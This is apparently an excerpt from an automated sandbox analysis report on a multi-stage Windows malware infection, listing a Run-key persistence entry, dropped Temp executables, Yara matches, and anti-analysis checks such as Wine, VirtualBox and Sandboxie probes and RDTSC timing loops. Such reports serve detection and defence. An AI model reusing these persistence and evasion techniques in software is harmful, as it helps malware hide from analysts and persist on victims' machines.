Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8fb472f3d3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009B26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 28_2_009B26DD
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0093FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 28_2_0093FC7C
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: Macromedia.com, 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D37FDE second address: D37FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC910593h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D36ED4 second address: D36EE0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC4CCEF6AD6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D36EE0 second address: D36EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D371C3 second address: D371C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D371C7 second address: D371CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D371CD second address: D371DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FC4CCEF6ADCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D371DB second address: D371FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC91058Eh 0x00000009 popad 0x0000000a push edx 0x0000000b jmp 00007FC4CC91058Bh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3739A second address: D373A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D373A0 second address: D373BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC91058Ah 0x00000009 jmp 00007FC4CC91058Ah 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D373BD second address: D373C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D373C3 second address: D37406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FC4CC910598h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 jnc 00007FC4CC910586h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 jmp 00007FC4CC91058Dh 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D37406 second address: D37412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FC4CCEF6AD6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D37412 second address: D3743A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910594h 0x00000007 je 00007FC4CC910586h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jne 00007FC4CC910586h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3743A second address: D3743E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D376EE second address: D37727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC91058Ah 0x00000009 js 00007FC4CC910586h 0x0000000f popad 0x00000010 jmp 00007FC4CC91058Fh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 jmp 00007FC4CC910590h 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D37727 second address: D37742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CCEF6AE5h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D378CF second address: D378D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D39397 second address: D3939D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3939D second address: D39426 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC4CC910592h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D3481h], edx 0x00000014 mov esi, edi 0x00000016 push 00000000h 0x00000018 mov cx, di 0x0000001b push 08C94595h 0x00000020 jmp 00007FC4CC91058Bh 0x00000025 xor dword ptr [esp], 08C94515h 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 mov esi, dword ptr [ebp+122D2A59h] 0x00000036 mov dx, 7C7Dh 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FC4CC910588h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 call 00007FC4CC910589h 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e jc 00007FC4CC910586h 0x00000064 push ecx 0x00000065 pop ecx 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D39426 second address: D3942B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3942B second address: D39437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D39437 second address: D3943D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3943D second address: D39457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jno 00007FC4CC91058Ch 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D39457 second address: D3945D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3945D second address: D3946A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D3946A second address: D394CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jne 00007FC4CCEF6ADCh 0x00000012 push eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop eax 0x00000016 popad 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FC4CCEF6AD8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 movzx edi, di 0x00000035 lea ebx, dword ptr [ebp+1244E185h] 0x0000003b movsx edi, cx 0x0000003e xchg eax, ebx 0x0000003f jmp 00007FC4CCEF6AE0h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a pop edx 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D394CA second address: D394CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D39532 second address: D39536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D4B5E5 second address: D4B5EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D27C7E second address: D27C9C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC4CCEF6AE2h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D27C9C second address: D27CA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D27CA0 second address: D27CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D27CA6 second address: D27CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5821C second address: D58234 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007FC4CCEF6AD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FC4CCEF6AD6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58234 second address: D58238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58238 second address: D5823E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5823E second address: D58244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D584F0 second address: D5853E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC4CCEF6AD6h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jnl 00007FC4CCEF6AD6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 jg 00007FC4CCEF6ADEh 0x0000001d jnp 00007FC4CCEF6ADEh 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC4CCEF6AE0h 0x0000002b jc 00007FC4CCEF6AD8h 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5853E second address: D58556 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC4CC910590h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58556 second address: D5855A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5867A second address: D58693 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC4CC910586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC4CC91058Bh 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58693 second address: D5869B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58AA3 second address: D58AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC4CC910586h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58AAE second address: D58AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FC4CCEF6AD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58AC8 second address: D58ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58C3D second address: D58C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58D7C second address: D58D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC4CC910586h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jc 00007FC4CC910586h 0x00000012 jmp 00007FC4CC91058Ah 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58F17 second address: D58F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58F1F second address: D58F33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC91058Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D58F33 second address: D58F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D590B9 second address: D590BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D590BD second address: D590C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D590C3 second address: D590C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D59244 second address: D5924F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC4CCEF6AD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D1DCE1 second address: D1DCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 js 00007FC4CC91058Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D59B52 second address: D59B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CCEF6ADBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D59B61 second address: D59B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D59B65 second address: D59B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC4CCEF6AD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D59EB9 second address: D59ECF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC4CC910586h 0x00000008 jmp 00007FC4CC91058Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D5A2F1 second address: D5A319 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC4CCEF6AECh 0x00000008 jmp 00007FC4CCEF6AE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FC4CCEF6AD6h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
